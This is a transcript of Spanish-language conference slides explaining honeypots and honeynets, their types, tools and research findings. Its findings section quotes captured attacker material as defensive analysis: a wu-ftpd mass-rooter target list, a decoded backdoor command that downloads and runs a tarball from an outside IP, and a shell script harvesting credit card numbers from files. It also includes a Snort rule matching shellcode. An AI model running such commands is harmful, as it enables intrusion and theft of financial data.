tarros de miel y redes trampa. el ponente zconsultor de seguridad en germinus zmiembro del grupo his...
TRANSCRIPT
Tarros de miel y redes trampa
El Ponente
Consultor de Seguridad en GerminusMiembro del grupo HISDesarrollador de software libre
Miembro del proyecto Debian Autor del Manual de Seguridad de Debian Desarrollador principal de Tiger Colaborador en el desarrollo de Bastille y
Nessus (entre otros)
Propósito
Mostrar qué son los tarros de miel y las redes trampa, para qué sirven y
qué aportan a la ingeniería de seguridad.
Resumen
El problemaDefinición y tipos de los tarros de
mielIntroducción a las redes trampaEjemplos de redes trampaDescubrimientosRecursos
El problema
El problema
Las organizaciones son objetivos estáticos, no se “mueve” y todo el mundo sabe dónde están.
Los “malos” tienen la iniciativa. Tienen recursos ilimitados y pueden atacarte cuando quieran, como quieran.
Solución Tradicional
Proteger su red lo mejor que pueda.
Esperar y desear que detecte cuando se produce un fallo.
Iniciativa
Los tarros de miel y las redes trampa pueden dar la iniciativa.
Motivos e intenciones
J4ck: why don't you start charging for packet attacks?J4ck: "give me x amount and I'll take bla bla offline for this amount of time”J1LL: it was illegal last I checkedJ4ck: heh, then everything you do is illegal. Why not make money off of it?J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
Descubrimiento de nuevas herramientas
Definición de los tarros de miel (o PED)
Historia
1990 The Cuckoo’s Egg Una noche con Berferd
1997 - Deception Toolkit1998 - NetFacade y CyberCop Sting1999 - El proyecto Honeynet2001 - Capturas de gusanos
Definición
Recursos de seguridad cuyo valor reside en ser sondeados, atacados o comprometidos.
Concepto
Recursos que no tienen servicios en producción ni uso autorizado.
Lo más probable es que cualquier conexión sea una sonda o un ataque, cualquier uso es no autorizado.
Una herramienta, no una solución
Los tarros de miel son muy flexibles, son de muchas formas y tamaños.
No se diseñan para un problema específico.
Puede utilizarse para distintos propósitos.
Ventajas
Información valiosaNúmero reducido de falsos positivosNúmero reducido de falsos negativosConcepto simpleNo exige muchos recursosRetorno de la inversión
Desventajas
RiesgoPunto de vista limitadoNo protege sistemas vulnerables
Tipos de tarros de miel
Producción Incrementa la seguridad en su red:
protección, detección y respuestaInvestigación
Utilizada para recoger información Alerta temprana y predicción de
ataques
Nivel de interacción
Los objetivos de los tarros de miel son distintos.
La funcionalidad depende de sus objetivos.
Cuanto más pueda hacer un atacante en un tarro de miel, mayor es el nivel de
interacción.
Nivel de interacción.
A mayor interacción más se puede conocer sobre el atacante.
Cuanto mayor la interacción, mayor el riesgo.
Los tarros de miel de producción suelen tener baja interacción mientras que las de investigación tienen alta interacción.
Niveles
Bajo – Emula servicios. Ejemplos: BackOfficer Friendly o Honeyd.
Medio – Acceso limitado a un sistema operativo controlado. Ejemplo: entorno chroot o de jaula.
Alto – Acceso a un sistema operativo totalmente funcional. Ejemplo: ManTrap o las redes trampa.
¿Cual es mejor?
¡Ninguno! Tienen todas ventajas y desventajas. Depende en lo que se quiera conseguir.
Baja interacción
Emula vulnerabilidades: Un atacante está limitado a interactuar con los servicios que se ofrezcan, y el nivel de funcionalidad que se le de a éstos. Utilizado fundamentalmente para
detectar o confundir. Captura de información limitada.
Emulación de servidor de FTP case $incmd_nocase in
QUIT* ) echo -e "221 Goodbye.\r" exit 0;; SYST* ) echo -e "215 UNIX Type: L8\r" ;; HELP* ) echo -e "214-The following commands are recognized (* =>'s unimplemented).\r" echo -e " USER PORT STOR MSAM* RNTO NLST MKD CDUP\r" echo -e " PASS PASV APPE MRSQ* ABOR SITE XMKD XCUP\r" echo -e " ACCT* TYPE MLFL* MRCP* DELE SYST RMD STOU\r" echo -e " SMNT* STRU MAIL* ALLO CWD STAT XRMD SIZE\r" echo -e " REIN* MODE MSND* REST XCWD HELP PWD MDTM\r" echo -e " QUIT RETR MSOM* RNFR LIST NOOP XPWD\r" echo -e "214 Direct comments to ftp@$domain.\r" ;; USER* ) parm1_nocase=`echo $parm1 | gawk '{print toupper($0);}'` if [ "$parm1_nocase" == "ANONYMOUS" ] then echo -e "331 Guest login ok, send your complete e-mail address as a password.\r" AUTH="ANONYMOUS" else echo -e "331 Password required for $parm1\r" AUTH=$parm1 fi ;;
Alta interacción
Ofrece un sistema operativo completo para que el atacante interactúe con él. Usado principalmente para investigación
y respuesta, pero también puede ser utilizado para prevención y detección.
Complejas de desplegar, pero potencialmente más seguro que las jaulas
Captura gran cantidad de información. NO emula
Valor de redes trampa de producción
Protección
Detección
Respuesta
Valor de redes trampa de investigación
Recogida de inteligenciaPredicción y Alerta Temprana
Ejemplos
Redes Trampa de producción
BackOfficer FriendlyLaBrea TarpitDeception ToolkitSmoke DetectorSpecterHoneyd
Specter
Honeyd.conf
create default set default personality "FreeBSD 2.2.1-STABLE" set default default tcp action reset add default tcp port 80 "sh /etc/Honeyd/scripts/web.sh" add default tcp port 22 "sh /etc/Honeyd/scripts/test.sh" add default tcp port 113 open add default tcp port 1 reset create windowsset windows personality "Windows NT 4.0 Server SP5-SP6" set windows default tcp action reset add windows tcp port 80 ”perl /etc/Honeyd/scripts/iis/main.pl" add windows tcp port 25 block add windows tcp port 23 proxy real-server.tracking-hackers.com:23add windows tcp port 22 proxy $ipsrc:22set windows uptime 3284460
bind 192.168.1.200 windows
Nmap.prints
# Contributed by Vilius [email protected] Windows NT 4.0 Server SP5-SP6TSeq(Class=RI%gcd=<8%SI=<11784E&>2CA4)T1(DF=Y%W=2017%ACK=S++%Flags=AS%Ops=MNWNNT)T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)T3(Resp=Y%DF=Y%W=2017%ACK=O%Flags=A%Ops=NNT)T4(DF=N%W=0%ACK=O%Flags=R%Ops=)T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)T6(DF=N%W=0%ACK=O%Flags=R%Ops=)T7(DF=N%W=0%ACK=S++%Flags=AR%Ops=)PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
¿Un router Cisco?
Tarros de miel de investigación
ManTrapRedes trampa
ManTrap
Sistema Operativo Host
Jaula 1 Jaula 2 Jaula 3 Jaula 4
Repetición de sesión
Red Trampa (Honeynet)
Tarro de miel OpenSource.Se trata de una arquitectura, no es ni un
producto ni ningún software concreto.Poblada de sistemas “vivos”.
GenII Honeynet
Control de Datos - GenII
alert tcp $HONEYNET any -> any 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)
http://www.snort.org
Redes trampas virtuales
Desplegando tarros de miel
Tarros de miel distribuidos
Tarros de miel wireless
Descubrimientos
El proyecto Honeynet
Una organización de voluntarios dedicados a la investigación de riesgos cibernéticos.
Desplegando redes a lo largo del planeta para que sean atacadas
¿Quién soy yo?
TESO wu-ftpd mass-Mass-rooter
1 | Caldera eDesktop|OpenLinux 2.3 update[wu-ftpd-2.6.1-13OL.i386.rpm] 2 | Debian potato [wu-ftpd_2.6.0-3.deb] 3 | Debian potato [wu-ftpd_2.6.0-5.1.deb] 4 | Debian potato [wu-ftpd_2.6.0-5.3.deb] 5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb] 6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] 7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm] 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm] 9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] 26 | SuSE 7.0 [wuftpd.rpm] 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm] 28 | SuSE 7.1 [wuftpd.rpm] 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm] 30 | SuSE 7.2 [wuftpd.rpm] 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm] 32 | SuSE 7.3 [wuftpd.rpm] 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
02/19-04:34:10.529350 206.123.208.5 -> 172.16.183.2PROTO011 TTL:237 TOS:0x0 ID:13784 IpLen:20 DgmLen:42202 00 17 35 B7 37 BA 3D B5 38 BB F2 36 86 BD 48 ...5.7.=.8..6..HD3 5D D9 62 EF 6B A2 F4 2B AE 3E C3 52 89 CD 57 .].b.k..+.>.R..WDD 69 F2 6C E8 1F 8E 29 B4 3B 8C D2 18 61 A9 F6 .i.l...).;...a..3B 84 CF 18 5D A5 EC 36 7B C4 15 64 B3 02 4B 91 ;...]..6{..d..K.0E 94 1A 51 A6 DD 23 AE 32 B8 FF 7C 02 88 CD 58 ...Q..#.2..|...XD6 67 9E F0 27 A1 1C 53 99 24 A8 2F 66 B8 EF 7A .g..'..S.$./f..zF2 7B B2 F6 85 12 A3 20 57 D4 5A E0 25 B0 2E BF .{..... W.Z.%...F6 48 7F C4 0A 95 20 AA 26 AF 3C B8 EF 41 78 01 .H.... .&.<..Ax.85 BC 00 89 06 3D BA 40 C6 0B 96 14 A5 DC 67 F2 [email protected] F8 81 0E 8A DC F3 0A 21 38 4F 66 7D 94 AB C2 |.......!8Of}...D9 F0 07 1E 35 4C 63 7A 91 A8 BF D6 ED 04 1B 32 ....5Lcz.......249 60 77 8E A5 BC D3 EA 01 18 2F 46 5D 74 8B A2 I`w......./F]t..B9 D0 E7 FE 15 2C 43 5A 71 88 9F B6 CD E4 FB 12 .....,CZq.......29 40 57 6E 85 9C B3 CA E1 F8 0F 26 3D 54 6B 82 )@Wn.......&=Tk.99 B0 C7 DE F5 0C 23 3A 51 68 7F 96 AD C4 DB F2 ......#:Qh......09 20 37 4E 65 7C 93 AA C1 D8 EF 06 1D 34 4B 62 . 7Ne|.......4Kb79 90 A7 BE D5 EC 03 1A 31 48 5F 76 8D A4 BB D2 y.......1H_v....E9 00 17 2E 45 5C 73 8A A1 B8 CF E6 FD 14 2B 42 ....E\s.......+B59 70 87 9E B5 CC E3 FA 11 28 3F 56 6D 84 9B B2 Yp.......(?Vm...C9 E0 F7 0E 25 3C 53 6A 81 98 AF C6 DD F4 0B 22 ....%<Sj......."39 50 67 7E 95 AC C3 DA F1 08 1F 36 4D 64 7B 92 9Pg~.......6Md{.A9 C0 D7 EE 05 1C 33 4A 61 78 8F A6 BD D4 EB 02 ......3Jax......19 30 47 5E 75 8C A3 BA D1 E8 FF 16 2D 44 5B 72 .0G^u.......-D[r89 A0 B7 CE E5 FC 13 2A 41 58 6F 86 9D B4 CB E2 .......*AXo.....F9 10 27 3E 55 6C 83 9A B1 C8 DF F6 0D 24 3B 52 ..'>Ul.......$;R69 80 i.
Nuevas tácticas - puertas traseras
starting decode of packet size 42017 35 B7 37 BA 3D B5 38 BB F2 36 86 BD 48 D3 5D local buf of size 42000 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73 ..killall -9 tts65 72 76 65 20 3B 20 6C 79 6E 78 20 2D 73 6F 75 erve ; lynx -sou72 63 65 20 68 74 74 70 3A 2F 2F 31 39 32 2E 31 rce http://192.136 38 2E 31 30 33 2E 32 3A 38 38 38 32 2F 66 6F 68.103.2:8882/fo6F 20 3E 20 2F 74 6D 70 2F 66 6F 6F 2E 74 67 7A o > /tmp/foo.tgz20 3B 20 63 64 20 2F 74 6D 70 20 3B 20 74 61 72 ; cd /tmp ; tar20 2D 78 76 7A 66 20 66 6F 6F 2E 74 67 7A 20 3B -xvzf foo.tgz ;20 2E 2F 74 74 73 65 72 76 65 20 3B 20 72 6D 20 ./ttserve ; rm 2D 72 66 20 66 6F 6F 2E 74 67 7A 20 74 74 73 65 -rf foo.tgz ttse72 76 65 3B 00 00 00 00 00 00 00 00 00 00 00 00 rve;............00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................B1 91 00 83 6A A6 39 05 B1 BF E7 6F BF 1D 88 CB ....j.9....o....C5 FE 24 05 00 00 00 00 00 00 00 00 00 00 00 00 ..$.............
Orden descifrada de la puerta trasera
Motivos
#!/bin/shecho " Caut carti de credit si incerc sa salvez in card.log"touch /dev/ida/.inet/card.logegrep -ir 'mastercard|visa' /home|egrep -v cache >>card.logegrep -ir 'mastercard|visa' /var|egrep -v cache >>card.logegrep -ir 'mastercard|visa' /root|egrep -v cache >>card.logif [ -d /www ]; then egrep -ir 'mastercard|visa' /www >>card.logfi
Predicción y alerta temprana
Resumen
Los tarros de miel y las redes trampa son un elemento de investigación interesante
No sirven para proteger sistemas inseguros
Pero son un nuevo elemento que ayuda a la investigación de problemas de seguridad y detección de ataques
Fuentes - Libros
Know Your Enemy http://www.honeynet.org/book/
Honeypots: Tracking Hackers http://www.tracking-hackers.com/book/
Fuentes - Sitios Web
http://www.tracking-hackers.comhttp://www.honeynet.orghttp://his.sourceforge.nethttp://www.nfr.net/products/bofhttp://www.citi.umich.edu/u/provos/honeyd/http://www.all.net/dtkhttp://www.specter.comhttp://www.mantrap.com
Fuentes - Publicaciones
Honeypots: Definitions and Values http://www.spitzner.net/honeypots.html
Honeynets http://www.honeynet.org/papers/honeynet/
Virtual Honeynets http://www.honeynet.org/papers/virtual/
Muchos traducidos en http://his.sourceforge.net/honeynet/papers/
Recursos - Listas de correo
Lista de correo de tarros de miel http://www.securityfocus.com/popups/forums/honeypots/
faq.shtml
Lista de correo Firewall Wizards http://www.nfr.net/mailman/listinfo/firewall-wizards
Lista de correo proyecto HIS (en español) https://lists.sourceforge.net/lists/listinfo/his-discusion
¿?